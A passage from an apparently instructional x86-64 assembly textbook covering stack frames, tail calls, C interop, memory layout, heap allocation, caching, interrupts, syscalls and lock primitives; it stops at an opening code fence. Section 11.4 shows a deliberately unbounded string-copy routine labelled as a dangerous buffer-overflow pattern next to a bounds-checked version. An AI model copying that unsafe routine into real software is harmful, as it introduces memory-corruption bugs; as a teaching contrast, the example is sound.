    return n * factorial(n-1);
}

; RDI = n
factorial:
    push rbp
    mov rbp, rsp
    
    cmp edi, 1
    jle .base_case
    
    ; Save n (reserve 16 bytes so RSP stays 16-byte aligned at the call)
    sub rsp, 16
    mov [rsp], edi
    
    ; factorial(n-1)
    dec edi
    call factorial
    
    ; Multiply by n
    mov edi, [rsp]
    add rsp, 16
    imul eax, edi
    
    jmp .return
    
.base_case:
    mov eax, 1
    
.return:
    pop rbp
    ret

Tail Recursion Optimization

When recursive call is the last operation:

int factorial_tail(int n, int acc) {
    if (n <= 1) return acc;
    return factorial_tail(n-1, acc * n);
}

; RDI = n, RSI = acc
factorial_tail:
    cmp edi, 1
    jle .done
    
    imul rsi, rdi      ; acc *= n
    dec edi            ; n--
    
    ; Tail call optimization - just jump
    jmp factorial_tail ; no new stack frame
    
.done:
    mov rax, rsi
    ret
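
Once the call has become a jump, the function is simply a loop. As a rough C rendering of what the assembly above computes (the name factorial_tail_loop is made up for this sketch):

```c
#include <assert.h>

/* Loop form of factorial_tail: the tail call became "update the
   arguments in place and jump back to the top". */
int factorial_tail_loop(int n, int acc) {
    assert(n <= 12);   /* with acc == 1, 13! no longer fits in a 32-bit int */
    while (n > 1) {
        acc *= n;      /* imul: acc *= n */
        n--;           /* dec:  n--      */
    }
    return acc;        /* .done: return the accumulator */
}
```

Stack usage is constant regardless of n, which is the practical benefit of the optimization.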

10.5 Tail Call Optimization

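Tail call optimization replaces a call that is immediately followed by ret with a jump, so the callee reuses the current stack frame and returns directly to the original caller.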

Before Optimization

int func1(int x) {
    return func2(x + 1);
}

func1:
    push rbp
    mov rbp, rsp
    
    inc edi
    call func2
    
    pop rbp
    ret

After Optimization

func1:
    inc edi
    jmp func2         ; jump instead of call/ret

Requirements for TCO:

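The call is the last operation before ret, and its result is returned unchanged
No local variables are needed after the call
The stack is restored to its state at entry before the jump, which also preserves alignment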

10.6 Interfacing with C Libraries

Calling printf from Assembly

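; hello.asm - Call printf
; Build (uses absolute addresses, so link without PIE):
;   nasm -f elf64 hello.asm && gcc -no-pie hello.o -o hello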
section .data
    format db "Hello, %s!", 10, 0
    name db "World", 0

section .text
    global main
    extern printf

main:
    push rbp
    mov rbp, rsp
    
    ; printf(format, name)
    lea rdi, [format]
    lea rsi, [name]
    xor eax, eax       ; 0 floating point args
    call printf
    
    ; return 0
    xor eax, eax
    pop rbp
    ret

Calling Assembly from C

#include <stdio.h>
extern int add(int a, int b);   // implemented in add.asm

int main() {
    int result = add(5, 3);
    printf("%d\n", result);
    return 0;
}

; add.asm
global add

add:
    mov eax, edi
    add eax, esi
    ret

Accessing Global Variables

// C code
extern int global_var;
void set_global(int x) {
    global_var = x;
}

; Assembly
extern global_var

set_global:
    mov [global_var], edi
    ret

PART IV — Memory & System Internals

Chapter 11: Stack, Heap & Memory Layout

11.1 Program Memory Layout

Typical Linux process memory layout:

High addresses (0x00007FFFFFFFFFFF)
+--------------------------+
|        Stack             |  (grows downward)
|           ↓              |
+--------------------------+
|                          |
|        Memory Mapped     |
|        Region            |
|                          |
+--------------------------+
|           ↑              |
|        Heap              |  (grows upward)
+--------------------------+
|        .bss              |  (uninitialized data)
+--------------------------+
|        .data             |  (initialized data)
+--------------------------+
|        .text             |  (code)
+--------------------------+
|        Reserved          |
Low addresses (0x400000)

Memory Segments

.text: Read-only, executable (code)
.data: Read-write, initialized global/static variables
.bss: Read-write, zero-initialized global/static
Heap: Dynamically allocated memory (malloc)
Stack: Local variables, function call context
Memory mapped: Shared libraries, mmap files

Viewing Process Memory

# View memory map of process
cat /proc/<pid>/maps

# Example output:
00400000-00401000 r-xp 00000000 08:01 12345    /bin/program
00600000-00601000 r--p 00000000 08:01 12345    /bin/program
00601000-00602000 rw-p 00001000 08:01 12345    /bin/program
7ffff7a00000-7ffff7bc0000 r-xp 00000000 08:01  libc.so
7ffff7bc0000-7ffff7dc0000 ---p 001c0000 08:01  libc.so
7ffff7dc0000-7ffff7dc4000 r--p 001c0000 08:01  libc.so
7ffff7dc4000-7ffff7dc6000 rw-p 001c4000 08:01  libc.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00  [stack]

11.2 Stack Frames

Detailed stack frame layout:

High addresses
+------------------+ <--- Previous frame
|    Arguments     |
+------------------+
| Return Address   | <--- CALL pushes this
+------------------+
| Saved RBP        | <--- push rbp
+------------------+ <--- RBP
| Local Variables  |
|                  |
+------------------+
|    Padding       | (for alignment)
+------------------+ <--- RSP
Low addresses

Stack Frame Example

int func(int a, int b) {
    int local1 = a + b;
    int local2 = a - b;
    return local1 * local2;
}

func:
    push rbp
    mov rbp, rsp
    sub rsp, 16          ; allocate 16 bytes for locals
    
    mov [rbp-4], edi     ; save a
    mov [rbp-8], esi     ; save b
    
    mov eax, [rbp-4]
    add eax, [rbp-8]
    mov [rbp-12], eax    ; local1 = a+b
    
    mov eax, [rbp-4]
    sub eax, [rbp-8]
    mov [rbp-16], eax    ; local2 = a-b
    
    mov eax, [rbp-12]
    imul eax, [rbp-16]   ; return local1*local2
    
    leave                ; mov rsp, rbp; pop rbp
    ret

Stack Overflow

Occurs when stack grows too large (infinite recursion, large locals):

; This will overflow the stack
infinite_recursion:
    call infinite_recursion
    ret

11.3 Heap Allocation

brk/sbrk System Calls

Traditional heap management:

; Increase heap by 4096 bytes
mov rax, 12          ; brk syscall number
mov rdi, 0           ; get current break
syscall

mov rbx, rax         ; save current break
add rbx, 4096        ; new break
mov rdi, rbx
mov rax, 12          ; brk
syscall

mmap for Large Allocations

Modern malloc uses mmap for large allocations:

; Allocate 1MB with mmap
mov rax, 9           ; mmap syscall
xor rdi, rdi         ; addr = NULL
mov rsi, 0x100000    ; length = 1MB
mov rdx, 3           ; PROT_READ | PROT_WRITE
mov r10, 0x22        ; MAP_PRIVATE | MAP_ANONYMOUS
mov r8, -1           ; fd = -1
xor r9, r9           ; offset = 0
syscall              ; returns address in RAX

Simple Heap Allocator

; Very simple bump allocator
section .bss
heap_start resb 0x100000  ; 1MB heap
heap_ptr   resq 1

section .text
init_heap:
    lea rax, [rel heap_start]
    mov [rel heap_ptr], rax
    ret

; Allocate RDI bytes
; Returns pointer in RAX (0 if out of memory)
alloc:
    ; Round the size up to a multiple of 16
    add rdi, 15
    and rdi, ~15
    
    ; Current pointer is the result
    mov rax, [rel heap_ptr]
    
    ; Check for overflow before committing the new pointer
    lea rdx, [rax + rdi]
    lea rcx, [rel heap_start + 0x100000]
    cmp rdx, rcx
    ja .oom
    
    mov [rel heap_ptr], rdx
    ret
    
.oom:
    xor eax, eax
    ret
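
For comparison, here is the same bump-allocation idea as a C sketch. The names bump_alloc, heap_start and heap_used are illustrative, and like the assembly version it never frees memory:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define HEAP_SIZE 0x100000u              /* 1 MB, as in the assembly version */

static _Alignas(16) unsigned char heap_start[HEAP_SIZE];
static size_t heap_used = 0;             /* offset of the next free byte */

/* Returns a 16-byte-aligned block of at least `size` bytes, or NULL when
   the heap is exhausted. The bounds check happens before the pointer is
   advanced, so a failed request leaves the allocator unchanged. */
void *bump_alloc(size_t size) {
    if (size > HEAP_SIZE)
        return NULL;                     /* also guards the rounding below */
    size_t rounded = (size + 15u) & ~(size_t)15u;
    if (rounded > HEAP_SIZE - heap_used)
        return NULL;
    void *p = heap_start + heap_used;
    assert(((uintptr_t)p & 15u) == 0);   /* sanity check on alignment */
    heap_used += rounded;
    return p;
}
```

A request for 1 byte followed by one for 20 bytes returns two pointers 16 bytes apart, because each size is rounded up to the alignment.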

11.4 Buffer Management

Buffer Overflows

Dangerous pattern:

; Unsafe string copy
unsafe_copy:
    mov rsi, source
    mov rdi, dest
.copy:
    mov al, [rsi]
    mov [rdi], al
    inc rsi
    inc rdi
    test al, al
    jnz .copy
    ret

Safe Copy

; Safe string copy with bounds checking
; RSI = source, RDI = dest, RDX = max length
safe_copy:
    push rbp
    mov rbp, rsp
    
    xor rcx, rcx
.copy:
    cmp rcx, rdx
    jae .done          ; max length reached (dest is NOT null-terminated in this case)
    
    mov al, [rsi + rcx]
    mov [rdi + rcx], al
    
    test al, al
    jz .done           ; null terminator
    
    inc rcx
    jmp .copy
    
.done:
    pop rbp
    ret
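
A bounded copy is usually easier to use safely when it always terminates the destination. The C sketch below shows one way to do that; bounded_copy is a hypothetical name and its truncation policy is a design choice, not something the assembly above implements:

```c
#include <assert.h>
#include <stddef.h>

/* Copies at most dest_size - 1 bytes from src and always writes a
   terminating '\0'. Returns the number of bytes copied, excluding the
   terminator. */
size_t bounded_copy(char *dest, const char *src, size_t dest_size) {
    assert(dest != NULL && src != NULL);
    if (dest_size == 0)
        return 0;                        /* no room even for the terminator */
    size_t i = 0;
    while (i < dest_size - 1 && src[i] != '\0') {
        dest[i] = src[i];
        i++;
    }
    dest[i] = '\0';
    return i;
}
```

Copying "hello" into a 4-byte buffer stores "hel" plus the terminator, so later string operations on the destination stay in bounds.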

11.5 Memory Alignment

Why Alignment Matters

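Unaligned accesses can be:

Slower (an access that crosses a cache line or page boundary costs extra cycles)
Illegal on some architectures (and for aligned SSE/AVX instructions such as movaps on x86)
Non-atomic (atomicity is generally guaranteed only for naturally aligned accesses)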

Alignment Rules

1-byte: any address
2-byte: even address
4-byte: multiple of 4
8-byte: multiple of 8
16-byte: multiple of 16 (SSE)
32-byte: multiple of 32 (AVX)

Ensuring Alignment

; Align stack
and rsp, ~15          ; align to 16 bytes

; Align allocation
add rax, 15
and rax, ~15

; Data alignment in data section
section .data
align 16
vector: dd 1.0, 2.0, 3.0, 4.0
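
The add-then-mask idiom above works for any power-of-two alignment. A small C sketch of the same arithmetic (align_up and align_down are illustrative names):

```c
#include <assert.h>
#include <stdint.h>

/* Round x up to the next multiple of align (align must be a power of two).
   Equivalent to: add rax, align-1 / and rax, ~(align-1). */
uint64_t align_up(uint64_t x, uint64_t align) {
    assert(align != 0 && (align & (align - 1)) == 0);
    return (x + align - 1) & ~(align - 1);
}

/* Round x down to a multiple of align, as "and rsp, ~15" does for the stack. */
uint64_t align_down(uint64_t x, uint64_t align) {
    assert(align != 0 && (align & (align - 1)) == 0);
    return x & ~(align - 1);
}
```

Rounding down is the right direction for the stack pointer because the stack grows toward lower addresses; rounding up is the right direction for allocation sizes.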

11.6 Cache Architecture

Cache Levels

Modern CPU cache hierarchy:

CPU Core
    |
    v
L1 Cache (32KB instruction + 32KB data)
    | (fastest, ~4 cycles)
    v
L2 Cache (256KB-1MB unified)
    | (fast, ~12 cycles)
    v
L3 Cache (8MB-30MB shared)
    | (slower, ~30 cycles)
    v
Main Memory (several GB)
    | (slow, ~200+ cycles)
    v
Disk (virtual memory)

Cache Lines

Memory transferred in cache lines (typically 64 bytes):

; Access pattern matters
; Bad: large stride, every access touches a different cache line
mov rcx, 1000
xor rax, rax
.strided:
    add rax, [rsi]
    add rsi, 4096           ; jump a whole page each iteration
    loop .strided

; Good: sequential access, 8 qwords share each 64-byte line
mov rcx, 1000
xor rax, rax
.sequential:
    add rax, [rsi]
    add rsi, 8
    loop .sequential

Cache-Friendly Code

Spatial locality: Access nearby memory
Temporal locality: Reuse data while cached
Stride patterns: Avoid large strides

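Matrix Traversal Example

Bad (column-major access):

; Access pattern: matrix[j][i] - poor locality
; matrix is 1000 x 1000 qwords, so one row is 8000 bytes.
; x86 addressing only allows scales of 1, 2, 4, 8, so the row
; stride is applied with pointer arithmetic.
    xor rcx, rcx                  ; i (column index)
.outer:
    xor rdx, rdx                  ; j (row index)
    lea rdi, [matrix + rcx*8]     ; &matrix[0][i]
.inner:
    mov rax, [rdi]                ; matrix[j][i]
    add rdi, 8000                 ; next row: large stride
    inc rdx
    cmp rdx, 1000
    jl .inner
    inc rcx
    cmp rcx, 1000
    jl .outer

Good (row-major access):

; Access pattern: matrix[i][j] - good locality
    xor rcx, rcx                  ; i (row index)
    lea rdi, [matrix]             ; &matrix[0][0]
.outer:
    xor rdx, rdx                  ; j (column index)
.inner:
    mov rax, [rdi + rdx*8]        ; matrix[i][j], sequential
    inc rdx
    cmp rdx, 1000
    jl .inner
    add rdi, 8000                 ; advance to the next row
    inc rcx
    cmp rcx, 1000
    jl .outer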
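
The two traversal orders compute the same result and differ only in the order memory is touched. A compact C sketch over a flat row-major array makes that explicit (the dimensions and function names are chosen for illustration):

```c
#include <assert.h>
#include <stddef.h>

#define ROWS 64
#define COLS 64

/* Row-major traversal: the inner loop walks consecutive addresses. */
long sum_row_major(const long *m) {
    assert(m != NULL);
    long total = 0;
    for (size_t i = 0; i < ROWS; i++)
        for (size_t j = 0; j < COLS; j++)
            total += m[i * COLS + j];
    return total;
}

/* Column-major traversal: the inner loop jumps COLS elements each step. */
long sum_col_major(const long *m) {
    assert(m != NULL);
    long total = 0;
    for (size_t j = 0; j < COLS; j++)
        for (size_t i = 0; i < ROWS; i++)
            total += m[i * COLS + j];
    return total;
}
```

On matrices much larger than the cache, timing these two functions is a simple way to observe the effect of stride; the difference at this small size is likely to be negligible.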

Cache Blocking (Tiling)

// Cache blocking for matrix multiplication
for (int i = 0; i < N; i += BLOCK)
    for (int j = 0; j < N; j += BLOCK)
        for (int k = 0; k < N; k += BLOCK)
            // Multiply block
            for (int ii = i; ii < i + BLOCK; ii++)
                for (int jj = j; jj < j + BLOCK; jj++)
                    for (int kk = k; kk < k + BLOCK; kk++)
                        C[ii][jj] += A[ii][kk] * B[kk][jj];
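
The loop nest above assumes N is a multiple of BLOCK. A self-contained variant that clamps each block to the matrix edge might look like the following sketch; the sizes, the flat row-major layout and the function names are assumptions made for the example:

```c
#include <assert.h>
#include <stddef.h>

#define N 70            /* deliberately not a multiple of BLOCK */
#define BLOCK 16

static size_t min_size(size_t a, size_t b) { return a < b ? a : b; }

/* C += A * B for N x N row-major matrices; the caller zeroes C first. */
void matmul_blocked(const double *A, const double *B, double *C) {
    assert(A != NULL && B != NULL && C != NULL);
    for (size_t i = 0; i < N; i += BLOCK)
        for (size_t j = 0; j < N; j += BLOCK)
            for (size_t k = 0; k < N; k += BLOCK)
                /* Multiply one block, clamped at the matrix edge */
                for (size_t ii = i; ii < min_size(i + BLOCK, N); ii++)
                    for (size_t jj = j; jj < min_size(j + BLOCK, N); jj++)
                        for (size_t kk = k; kk < min_size(k + BLOCK, N); kk++)
                            C[ii * N + jj] += A[ii * N + kk] * B[kk * N + jj];
}

/* Unblocked reference with the same accumulation order over k. */
void matmul_naive(const double *A, const double *B, double *C) {
    assert(A != NULL && B != NULL && C != NULL);
    for (size_t i = 0; i < N; i++)
        for (size_t j = 0; j < N; j++)
            for (size_t k = 0; k < N; k++)
                C[i * N + j] += A[i * N + k] * B[k * N + j];
}
```

A reasonable starting point for BLOCK is a size where three BLOCK x BLOCK tiles fit in the L1 data cache; the best value is hardware dependent and worth measuring.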

Chapter 12: Interrupts & System Calls

12.1 Hardware Interrupts

Hardware interrupts signal events from devices.

Interrupt Vector Table (IVT) in real mode:

256 entries
Each entry: 4 bytes (segment:offset)
Located at physical address 0

Interrupt Descriptor Table (IDT) in protected/long mode:

256 entries
Each entry: 16 bytes in 64-bit mode (8 bytes in 32-bit protected mode)

IDT Entry Format (64-bit)

Bytes 0-1: Offset low (15:0)
Bytes 2-3: Segment selector
Byte 4: IST (bits 0-2), reserved (bits 3-7)
Byte 5: Type and attributes
    Bit 7: Present
    Bits 6-5: DPL (Descriptor Privilege Level)
    Bit 4: Reserved (0)
    Bits 3-0: Gate Type
        0xE = 64-bit interrupt gate
        0xF = 64-bit trap gate
        (In 32-bit protected mode: 0x5 = task gate,
         0xE = 32-bit interrupt gate, 0xF = 32-bit trap gate)
Bytes 6-7: Offset middle (31:16)
Bytes 8-11: Offset high (63:32)
Bytes 12-15: Reserved (0)
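
To make the 64-bit gate layout concrete, the following C sketch packs a handler address into the 16 bytes of a descriptor, one byte at a time so that it does not depend on struct packing or host endianness. The function name and parameters are illustrative, not taken from any kernel:

```c
#include <assert.h>
#include <stdint.h>

/* Encode one 64-bit IDT gate descriptor into 16 little-endian bytes.
   type_attr is the full attribute byte, e.g. 0x8E = present, DPL 0,
   interrupt gate. */
void idt_encode_gate(uint8_t out[16], uint64_t handler, uint16_t selector,
                     uint8_t ist, uint8_t type_attr) {
    assert(ist <= 7);                            /* IST index is 3 bits */
    out[0] = (uint8_t)(handler & 0xFF);          /* offset 15:0  */
    out[1] = (uint8_t)((handler >> 8) & 0xFF);
    out[2] = (uint8_t)(selector & 0xFF);         /* code segment selector */
    out[3] = (uint8_t)(selector >> 8);
    out[4] = ist;                                /* IST, upper bits reserved */
    out[5] = type_attr;                          /* P, DPL, gate type */
    out[6] = (uint8_t)((handler >> 16) & 0xFF);  /* offset 31:16 */
    out[7] = (uint8_t)((handler >> 24) & 0xFF);
    for (int i = 0; i < 4; i++)                  /* offset 63:32 */
        out[8 + i] = (uint8_t)((handler >> (32 + 8 * i)) & 0xFF);
    for (int i = 12; i < 16; i++)                /* reserved, must be zero */
        out[i] = 0;
}
```

Filling the fields at run time like this also sidesteps the need for the assembler to split a label's address into pieces.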

Loading IDT

; Load IDT register
lidt [idtr]

; IDTR format
idtr:
    dw 256*16 - 1     ; limit (size - 1)
    dq idt             ; base address

Common Hardware Interrupts

IRQ0: Programmable Interval Timer
IRQ1: Keyboard
IRQ2: Cascade for IRQ8-15
IRQ3: COM2
IRQ4: COM1
IRQ6: Floppy disk
IRQ8: RTC
IRQ12: PS/2 Mouse
IRQ14: Primary ATA
IRQ15: Secondary ATA

12.2 Software Interrupts

Software interrupts are triggered by the INT instruction.

INT Instruction

int 0x80             ; software interrupt
int3                 ; breakpoint interrupt (single-byte 0xCC)
into                 ; interrupt on overflow (not valid in 64-bit mode)

Common Software Interrupts

INT 0x10: BIOS video services
INT 0x13: BIOS disk services
INT 0x16: BIOS keyboard services
INT 0x21: DOS services
INT 0x80: Linux syscall (32-bit)
INT 0x2E: Windows syscall

12.3 Linux Syscalls

32-bit Linux Syscalls

Using int 0x80:

; Syscall numbers in /usr/include/asm/unistd_32.h
; Arguments: EBX, ECX, EDX, ESI, EDI, EBP
; EAX = syscall number

section .data
    msg db 'Hello', 10
    len equ $ - msg

section .text
    global _start

_start:
    ; write(1, msg, len)
    mov eax, 4         ; sys_write
    mov ebx, 1         ; stdout
    mov ecx, msg
    mov edx, len
    int 0x80
    
    ; exit(0)
    mov eax, 1         ; sys_exit
    xor ebx, ebx
    int 0x80

64-bit Linux Syscalls

Using syscall instruction:

; Syscall numbers in /usr/include/asm/unistd_64.h
; Arguments: RDI, RSI, RDX, R10, R8, R9
; RAX = syscall number
; RCX and R11 are clobbered (RIP and RFLAGS)

section .data
    msg db 'Hello', 10
    len equ $ - msg

section .text
    global _start

_start:
    ; write(1, msg, len)
    mov rax, 1         ; sys_write
    mov rdi, 1         ; stdout
    mov rsi, msg
    mov rdx, len
    syscall
    
    ; exit(0)
    mov rax, 60        ; sys_exit
    xor rdi, rdi
    syscall

Common Syscall Numbers (x86-64)

RAX	Name	RDI	RSI	RDX	R10	R8	R9
0	read	fd	buf	count	-	-	-
1	write	fd	buf	count	-	-	-
2	open	path	flags	mode	-	-	-
3	close	fd	-	-	-	-	-
9	mmap	addr	len	prot	flags	fd	off
10	mprotect	addr	len	prot	-	-	-
12	brk	addr	-	-	-	-	-
39	getpid	-	-	-	-	-	-
57	fork	-	-	-	-	-	-
60	exit	status	-	-	-	-	-
63	uname	buf	-	-	-	-	-
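
From C, the same numbered interface is reachable through the libc syscall() wrapper, which loads the number and arguments into the registers listed above. This sketch assumes Linux with glibc (or a compatible libc); raw_write and raw_getpid are hypothetical names:

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/syscall.h>
#include <unistd.h>

/* write(fd, buf, count) issued by syscall number instead of the libc wrapper. */
long raw_write(int fd, const void *buf, unsigned long count) {
    assert(buf != NULL || count == 0);
    return syscall(SYS_write, fd, buf, count);
}

/* getpid() takes no arguments, so only the syscall number is passed. */
long raw_getpid(void) {
    return syscall(SYS_getpid);
}
```

SYS_write and SYS_getpid come from <sys/syscall.h> and resolve to the numbers in the table on x86-64, so the code stays readable without hard-coding them.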

12.4 Windows API Calls

Windows Syscall Mechanism

Windows uses sysenter for fast syscalls (32-bit) and syscall (64-bit).

Calling Windows API

; Windows x64 assembly (MASM)
extern ExitProcess: PROC
extern WriteFile: PROC
extern GetStdHandle: PROC

.data
    msg db "Hello, World!", 13, 10
    len equ $ - msg
    written dq ?

.code
main PROC
    sub rsp, 38h       ; 32-byte shadow space + 5th-argument slot, keeps RSP 16-byte aligned
    
    ; GetStdHandle(STD_OUTPUT_HANDLE)
    mov ecx, -11       ; STD_OUTPUT_HANDLE
    call GetStdHandle
    
    ; WriteFile(handle, msg, len, &written, NULL)
    mov rcx, rax       ; handle
    lea rdx, msg       ; buffer
    mov r8d, len       ; length
    lea r9, written    ; bytes written
    mov qword ptr [rsp+20h], 0   ; lpOverlapped (5th argument, just above the shadow space)
    call WriteFile
    
    ; ExitProcess(0)
    xor ecx, ecx
    call ExitProcess
    
main ENDP
END

Windows Syscall Numbers

Syscall numbers change between Windows versions. They're found in the System Service Dispatch Table (SSDT).

12.5 Writing Custom Interrupt Handlers

Simple Interrupt Handler (Real Mode)

; Real mode interrupt handler
[org 0x7C00]

; Set up IVT entry for INT 0x40
cli
xor ax, ax
mov ds, ax
mov word [0x100], custom_handler   ; offset
mov word [0x102], cs                ; segment
sti

; Main program
int 0x40                            ; invoke the new handler once
jmp $

custom_handler:
    pusha
    ; Handle interrupt
    mov si, msg
    call print_string
    popa
    iret

msg db "Interrupt handled!", 0

; Print string function
print_string:
    lodsb
    or al, al
    jz .done
    mov ah, 0x0E
    int 0x10
    jmp print_string
.done:
    ret

times 510-($-$$) db 0
dw 0xAA55

Protected Mode IDT Setup

; Set up IDT in 32-bit protected mode (8 bytes per entry)
idt_start:
    ; Interrupt gate for IRQ0 (timer)
    ; (if the assembler rejects & and >> on labels, fill in the two
    ;  offset fields at run time instead)
    dw handler_timer & 0xFFFF      ; offset low (15:0)
    dw 0x08                         ; segment selector (code)
    db 0                             ; reserved (always 0)
    db 0x8E                          ; present, ring 0, 32-bit interrupt gate
    dw handler_timer >> 16           ; offset high (31:16)
    
    ; ... more entries ...

idt_end:

idtr:
    dw idt_end - idt_start - 1      ; limit
    dd idt_start                     ; base (32-bit)
    
; Load IDT
lidt [idtr]

Interrupt Handler in Protected Mode

; Interrupt handler - must save all registers
handler_timer:
    pusha
    push ds
    push es
    push fs
    push gs
    
    ; Set up kernel data segments
    mov ax, 0x10        ; kernel data selector
    mov ds, ax
    mov es, ax
    
    ; Handle interrupt
    inc dword [timer_ticks]
    
    ; Send EOI to PIC
    mov al, 0x20
    out 0x20, al
    
    ; Restore registers
    pop gs
    pop fs
    pop es
    pop ds
    popa
    
    iret               ; return from interrupt

Interrupt Handler in Long Mode

; 64-bit interrupt handler
handler_timer:
    ; Save all registers
    push rax
    push rbx
    push rcx
    push rdx
    push rsi
    push rdi
    push rbp
    push r8
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push r15
    
    ; Handle interrupt
    inc qword [timer_ticks]
    
    ; Send EOI to the local APIC (assumes the default xAPIC MMIO base is identity-mapped)
    mov eax, 0xFEE000B0    ; APIC EOI register (zero-extended into RAX)
    mov dword [rax], 0
    
    ; Restore registers
    pop r15
    pop r14
    pop r13
    pop r12
    pop r11
    pop r10
    pop r9
    pop r8
    pop rbp
    pop rdi
    pop rsi
    pop rdx
    pop rcx
    pop rbx
    pop rax
    
    iretq              ; 64-bit return from interrupt

Chapter 13: Multithreading & Concurrency

13.1 Atomic Instructions

Atomic operations are indivisible - they appear to execute as a single unit.

LOCK Prefix

lock inc dword [counter]   ; atomic increment
lock xadd [counter], eax   ; atomic exchange and add
lock cmpxchg [mem], ebx    ; atomic compare and exchange
lock bts dword [mem], 5    ; atomic bit test and set (operand size required)

XCHG is Implicitly Locked

xchg eax, [mem]            ; always atomic (LOCK implied)

CMPXCHG (Compare and Exchange)

; Compare EAX with [mem], if equal set [mem]=EBX
; else load [mem] into EAX
lock cmpxchg [mem], ebx

; Example: atomic increment
retry:
    mov eax, [counter]
    mov ebx, eax
    inc ebx
    lock cmpxchg [counter], ebx
    jne retry           ; if EAX != [counter], try again

Atomic Operations in C

// GCC atomic builtins
__sync_fetch_and_add(&counter, 1);
__sync_lock_test_and_set(&flag, 1);
__sync_bool_compare_and_swap(&ptr, old, new);

// C11 atomics
#include <stdatomic.h>
atomic_int counter;
atomic_fetch_add(&counter, 1);

13.2 Locks & Mutexes

Spinlock Implementation

; Simple spinlock
; (the variable is named lock_var because "lock" is a reserved prefix in NASM)
spinlock:
    mov eax, 1
    xchg eax, [lock_var]    ; try to acquire
    test eax, eax
    jnz spinlock            ; if already locked, spin
    ret

spinunlock:
    mov dword [lock_var], 0
    ret

Improved Spinlock with PAUSE

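; lock_var is the lock word ("lock" itself is a reserved prefix in NASM)
spinlock:
    mov eax, 1
    xchg eax, [lock_var]
    test eax, eax
    jz .acquired        ; got lock
    
.spin:
    pause               ; hint for hyper-threading
    cmp dword [lock_var], 0
    jne .spin           ; spin on a plain read until the lock looks free
    jmp spinlock        ; try again
    
.acquired:
    ret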

Ticket Lock

Fairer than a plain spinlock, because waiters are served in FIFO order:

; Ticket lock structure
struc ticket_lock
    .current resd 1     ; current ticket serving
    .next    resd 1     ; next ticket to issue
endstruc

; lock_var is an instance of ticket_lock ("lock" is a reserved prefix in NASM)

; Acquire lock
ticket_lock_acquire:
    mov eax, 1
    lock xadd [lock_var + ticket_lock.next], eax  ; get ticket
    ; EAX now has our ticket number
    
.spin:
    cmp eax, [lock_var + ticket_lock.current]
    je .acquired
    pause
    jmp .spin
.acquired:
    ret

; Release lock
ticket_lock_release:
    lock inc dword [lock_var + ticket_lock.current]
    ret

13.3 Memory Barriers

Memory barriers prevent reordering of memory operations.

MFENCE (Memory Fence)

mfence               ; serializes all memory operations
lfence               ; serializes loads
sfence               ; serializes stores

When Barriers Are Needed

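; Producer thread
    mov dword [data], 1
    sfence            ; ensure data visible before flag (strictly needed only
                      ; after non-temporal stores; normal x86 stores stay in order)
    mov dword [flag], 1

; Consumer thread
.wait:
    pause
    cmp dword [flag], 0
    je .wait
    lfence            ; ensure flag read before data (normal x86 loads are
                      ; already ordered; shown for illustration)
    mov eax, [data]   ; guaranteed to see data=1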

13.4 Thread Local Storage

Thread Local Storage (TLS) provides per-thread variables.

x86-64 TLS Implementation

Using FS segment register on Linux:

; Access TLS variable (offset in FS)
mov rax, [fs:0]       ; thread pointer
mov rbx, [fs:tls_var_offset]

Setting FS Base

; Set FS base address (privileged)
mov ecx, 0xC0000100   ; MSR_FS_BASE
mov eax, [thread_struct]  ; low 32 bits
mov edx, [thread_struct+4] ; high 32 bits
wrmsr

; Using WRFSBASE instruction (if CR4.FSGSBASE set)
wrfsbase rax         ; set FS base to RAX

TLS in C

// Thread-local variable
__thread int tls_var;

// Access becomes:
// mov eax, [fs:tls_var_offset]

13.5 Synchronization Primitives

Semaphore Implementation

; Semaphore structure
struc semaphore
    .count resd 1      ; current count
    .waiters resd 1    ; wait queue (simplified)
endstruc

; Wait (P operation)
sem_wait:
.loop:
    mov eax, -1        ; reload each time: XADD overwrites EAX
    lock xadd [sem + semaphore.count], eax   ; count--, EAX = old count
    test eax, eax
    jg .acquired       ; old count was > 0
    
    ; Need to wait (simplified - should block)
    ; In real OS, would add to wait queue and yield
    
    ; Undo the decrement and try again
    lock inc dword [sem + semaphore.count]
    pause
    jmp .loop
    
.acquired:
    ret

; Signal (V operation)
sem_signal:
    lock inc dword [sem + semaphore.count]
    ; Wake up waiters (if any)
    ret

Reader-Writer Lock

; Reader-writer lock structure
struc rwlock
    .readers resd 1    ; number of active readers
    .writer  resd 1    ; writer flag
endstruc

; rw is an instance of the structure (the struc name is only a layout)
section .bss
rw: resb rwlock_size

section .text

; Reader lock
read_lock:
.loop:
    mov eax, [rw + rwlock.writer]
    test eax, eax
    jnz .loop          ; writer active, spin
    
    lock inc dword [rw + rwlock.readers]
    
    ; Check if writer started while we incremented
    cmp dword [rw + rwlock.writer], 0
    je .acquired
    
    ; Writer started, undo increment and retry
    lock dec dword [rw + rwlock.readers]
    pause
    jmp .loop
    
.acquired:
    ret

; Reader unlock
read_unlock:
    lock dec dword [rw + rwlock.readers]
    ret

; Writer lock
write_lock:
.try:
    mov eax, 1
    xchg [rw + rwlock.writer], eax   ; XCHG with memory is implicitly locked
    test eax, eax
    jz .wait_readers   ; got the writer flag
    pause
    jmp .try           ; another writer holds it, retry
    
    ; Flag is ours; wait for active readers to finish
.wait_readers:
    cmp dword [rw + rwlock.readers], 0
    je .acquired
    pause
    jmp .wait_readers
    
.acquired:
    ret

; Writer unlock
write_unlock:
    mov dword [rw + rwlock.writer], 0
    ret

Condition Variable

; Wait on condition
cond_wait:
    ; Must have mutex locked
    ; Release mutex and block
    ; On wake, reacquire mutex
    
    ; Simplified - just spin until the condition is signalled
.wait:
    pause
    mov eax, [cond]
    test eax, eax
    jz .wait
    ret

; Signal condition
cond_signal:
    mov dword [cond], 1
    ret

PART V — Optimization & Performance Engineering

Chapter 14: CPU Pipelines & Execution

14.1 Instruction Pipeline

A pipeline allows multiple instructions to be processed simultaneously.

Classic 5-Stage RISC Pipeline

Stage 1: IF (Instruction Fetch)
Stage 2: ID (Instruction Decode)
Stage 3: EX (Execute)
Stage 4: MEM (Memory Access)
Stage 5: WB (Write Back)

Clock 1: IF1
Clock 2: ID1  IF2
Clock 3: EX1  ID2  IF3
Clock 4: MEM1 EX2  ID3  IF4
Clock 5: WB1  MEM2 EX3  ID4  IF5
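
The diagram implies a simple timing rule for an ideal pipeline with no stalls: the first instruction needs one cycle per stage, and each later instruction completes one cycle after the previous one. A small C sketch of that formula (pipeline_cycles is an illustrative name):

```c
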